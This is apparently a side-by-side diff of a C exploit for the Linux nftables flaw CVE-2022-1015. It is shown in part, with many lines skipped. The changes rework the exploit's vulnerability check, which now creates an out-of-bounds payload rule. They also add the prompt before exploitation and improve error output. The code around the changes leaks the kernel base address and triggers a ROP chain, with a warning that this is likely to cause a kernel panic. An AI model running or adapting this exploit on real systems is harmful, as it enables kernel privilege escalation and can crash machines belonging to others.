| skipped 483 lines |
484 | 484 | | execve(new_argv[0], new_argv, envp); |
485 | 485 | | puts("Couldn't start unshare wrapper.."); |
486 | 486 | | puts("Recompile the exploit with an appropriate unshare path."); |
| 487 | + | exit(EXIT_FAILURE); |
487 | 488 | | } |
488 | 489 | | if (strcmp("EXPLOIT", argv[1])) { |
489 | 490 | | puts("[-] Something went wrong..."); |
| skipped 28 lines |
518 | 519 | | |
519 | 520 | | if (create_base_chain_rule(nl, table_name, base_chain_name, NFPROTO_IPV4, NULL, &seq)) { |
520 | 521 | | perror("Failed creating base chain rule"); |
521 | | - | puts("[+] Target is NOT vulnerable to CVE-2022-1015"); |
522 | 522 | | exit(EXIT_FAILURE); |
523 | 523 | | } |
| 524 | + | |
524 | 525 | | puts("[+] Created base chain rule"); |
525 | | - | puts("[+] Target IS vulnerable to CVE-2022-1015"); |
526 | | - | puts("[+] Type 'y' to try exploiting the target."); |
527 | | - | puts("!!!BEWARE: THIS IS LIKELY TO CAUSE A KERNEL PANIC!!!"); |
528 | 526 | | |
529 | | - | char a[4] = {}; |
530 | | - | read(0, a, 1); |
| 527 | + | // we need to make a rule first in order to replace it |
| 528 | + | // in our leaky rule creation. it's a bit of a hack but it works |
| 529 | + | // We can also use it to determine whether the system is vulnerable |
| 530 | + | // before actually exploiting. |
531 | 531 | | |
532 | | - | if (a[0] != 'y') { |
533 | | - | puts("Bye!"); |
534 | | - | exit(EXIT_SUCCESS); |
| 532 | + | struct vuln_expr_params v; |
| 533 | + | |
| 534 | + | // offset 0xca and len 0xff is OOB |
| 535 | + | if (calc_vuln_expr_params(&v, 0xca, 0x00, 0xff)) { |
| 536 | + | puts("[-] Something went horribly wrong..."); |
| 537 | + | exit(EXIT_FAILURE); |
535 | 538 | | } |
536 | 539 | | |
537 | | - | // we need to make it first in order to replace it |
538 | | - | // it's a bit of a hack but it works |
539 | 540 | | struct nftnl_rule* aux_rule = build_rule(table_name, aux_chain_name, NFPROTO_IPV4, NULL); |
540 | | - | rule_add_immediate_verdict(aux_rule, NF_ACCEPT, NULL); |
| 541 | + | rule_add_payload(aux_rule, NFT_PAYLOAD_INNER_HEADER, 8, v.max_len, v.value); |
541 | 542 | | |
542 | 543 | | err = send_batch_request( |
543 | 544 | | nl, |
| skipped 3 lines |
547 | 548 | | ); |
548 | 549 | | |
549 | 550 | | if (err) { |
550 | | - | perror("Failed creating auxiliary chain rule"); |
| 551 | + | puts(CLR_RED "[+] TARGET IS NOT VULNERABLE to CVE-2022-1015!" CLR_RESET); |
551 | 552 | | exit(EXIT_FAILURE); |
552 | 553 | | } |
553 | 554 | | |
554 | | - | puts("[+] Created auxilary chain's initial infoleak rule."); |
| 555 | + | puts("[+] Succesfully created rule with OOB nft_payload!"); |
| 556 | + | puts(CLR_GRN "[+] TARGET IS VULNERABLE to CVE-2022-1015!" CLR_RESET); |
| 557 | + | puts("[+] Type 'y' to try exploiting the target."); |
| 558 | + | puts(CLR_RED "!!!BEWARE: THIS IS LIKELY TO CAUSE A KERNEL PANIC!!!" CLR_RESET); |
| 559 | + | |
| 560 | + | char a[4] = {}; |
| 561 | + | read(0, a, 1); |
| 562 | + | |
| 563 | + | if (a[0] != 'y') { |
| 564 | + | puts("Bye!"); |
| 565 | + | exit(EXIT_SUCCESS); |
| 566 | + | } |
555 | 567 | | |
556 | 568 | | #define SERVER_HOST "127.0.0.1" |
557 | 569 | | #define SERVER_PORT 9999 |
| skipped 13 lines |
571 | 583 | | uint64_t kernel_addr = 0xffffffff00000000 + leak + (LEAK_BASE_OFFSET & 0xff); |
572 | 584 | | uint64_t kernel_base = kernel_addr - LEAK_BASE_OFFSET; |
573 | 585 | | |
574 | | - | printf("[+] Kernel base @ 0x%.16lx\n", kernel_base); |
575 | 586 | | |
| 587 | + | // If the kernel base isn't aligned we should probably not continue. |
576 | 588 | | if((kernel_base & 0xfffff) != 0) { |
577 | 589 | | puts("[-] Leak failed."); |
| 590 | + | puts("[-] Try changing offsets / lengths / chain types."); |
| 591 | + | puts("[-] If all leaked bytes were ff, this is probably because of corrupted loopback state.. RIP"); |
578 | 592 | | exit(EXIT_FAILURE); |
579 | 593 | | } |
580 | 594 | | |
| 595 | + | printf("[+] Kernel base @ 0x%.16lx\n", kernel_base); |
581 | 596 | | stop_listener(pid); |
582 | 597 | | struct unft_base_chain_param bp; |
583 | 598 | | bp.hook_num = NF_INET_LOCAL_IN; |
| skipped 14 lines |
598 | 613 | | trigger_rop(nl, kernel_base, &server, err); |
599 | 614 | | after_rop(); |
600 | 615 | | } |
| 616 | + | |